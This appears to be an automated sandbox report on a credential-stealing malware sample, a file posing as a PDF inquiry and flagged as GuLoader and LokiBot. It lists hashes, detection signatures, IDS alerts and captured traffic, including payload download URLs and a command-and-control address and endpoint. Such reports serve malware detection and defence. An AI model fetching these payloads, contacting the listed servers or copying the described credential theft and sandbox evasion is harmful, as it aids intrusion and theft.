Loading ...

Play interactive tourEdit tour

Analysis Report INQUIRY-11062020_PDF .scr

Overview

General Information

Sample Name:INQUIRY-11062020_PDF .scr (renamed file extension from scr to exe)
Analysis ID:311006
MD5:5207df389f5abacaff17bc4bd84810ec
SHA1:99162953a06cfbfb5734b8b90766b027bf8d5500
SHA256:3728d18f32ddaf2f72a64f65da6d401f054ac5f6bae9f548a4cb85848317cf3a
Tags:Lokiscr

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • INQUIRY-11062020_PDF .exe (PID: 4812 cmdline: 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe' MD5: 5207DF389F5ABACAFF17BC4BD84810EC)
    • INQUIRY-11062020_PDF .exe (PID: 6512 cmdline: 'C:\Users\user\Desktop\INQUIRY-11062020_PDF .exe' MD5: 5207DF389F5ABACAFF17BC4BD84810EC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: INQUIRY-11062020_PDF .exe PID: 6512JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
    Process Memory Space: INQUIRY-11062020_PDF .exe PID: 6512JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
      Process Memory Space: INQUIRY-11062020_PDF .exe PID: 4812JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
        Process Memory Space: INQUIRY-11062020_PDF .exe PID: 4812JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.binAvira URL Cloud: Label: malware
          Source: http://www.termorolne.rs/mpa/test_jCFQlqMshp74.binAvira URL Cloud: Label: malware
          Multi AV Scanner detection for submitted fileShow sources
          Source: INQUIRY-11062020_PDF .exeVirustotal: Detection: 29%Perma Link
          Source: INQUIRY-11062020_PDF .exeReversingLabs: Detection: 33%
          Source: INQUIRY-11062020_PDF .exeVirustotal: Detection: 29%Perma Link
          Source: INQUIRY-11062020_PDF .exeReversingLabs: Detection: 33%
          Machine Learning detection for sampleShow sources
          Source: INQUIRY-11062020_PDF .exeJoe Sandbox ML: detected
          Source: INQUIRY-11062020_PDF .exeJoe Sandbox ML: detected

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49730 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49730 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49731 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49731 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49732 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49732 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49732 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49732 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49733 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49730 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49730 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49731 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49731 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49732 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49732 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49732 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49732 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 195.69.140.147:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49733 -> 195.69.140.147:80
          Source: Joe Sandbox ViewIP Address: 38.108.185.79 38.108.185.79
          Source: Joe Sandbox ViewIP Address: 38.108.185.79 38.108.185.79
          Source: Joe Sandbox ViewIP Address: 195.69.140.147 195.69.140.147
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /mpa/test_jCFQlqMshp74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.termorolne.rsCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.termorolne.rsCache-Control: no-cacheConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: od.lkCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: GET /mpa/test_jCFQlqMshp74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.termorolne.rsCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.termorolne.rsCache-Control: no-cacheConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: od.lkCache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 163Connection: close
          Source: global trafficHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 163Connection: close
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.140.147
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00569062 InternetReadFile,8_2_00569062
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00569062 InternetReadFile,8_2_00569062
          Source: global trafficHTTP traffic detected: GET /mpa/test_jCFQlqMshp74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.termorolne.rsCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.termorolne.rsCache-Control: no-cacheConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: od.lkCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /mpa/test_jCFQlqMshp74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.termorolne.rsCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.termorolne.rsCache-Control: no-cacheConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /s/NzhfMjExNTQ1MjJf/test_jCFQlqMshp74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: od.lkCache-Control: no-cache
          Source: unknownDNS traffic detected: queries for: www.termorolne.rs
          Source: unknownDNS traffic detected: queries for: www.termorolne.rs
          Source: unknownHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 190Connection: close
          Source: unknownHTTP traffic detected: POST /.op/cr.php/XGfxkVvZa76tV HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 195.69.140.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 44FCD1D4Content-Length: 190Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Nov 2020 10:57:27 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Nov 2020 10:57:27 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tV
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.327540247.000000001E2C5000.00000004.00000001.sdmpString found in binary or memory: http://195.69.140.147/.op/cr.php/XGfxkVvZa76tVi4_
          Source: INQUIRY-11062020_PDF .exe, 00000008.00000002.324042470.0000000000936000.00000004.00000020.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/0
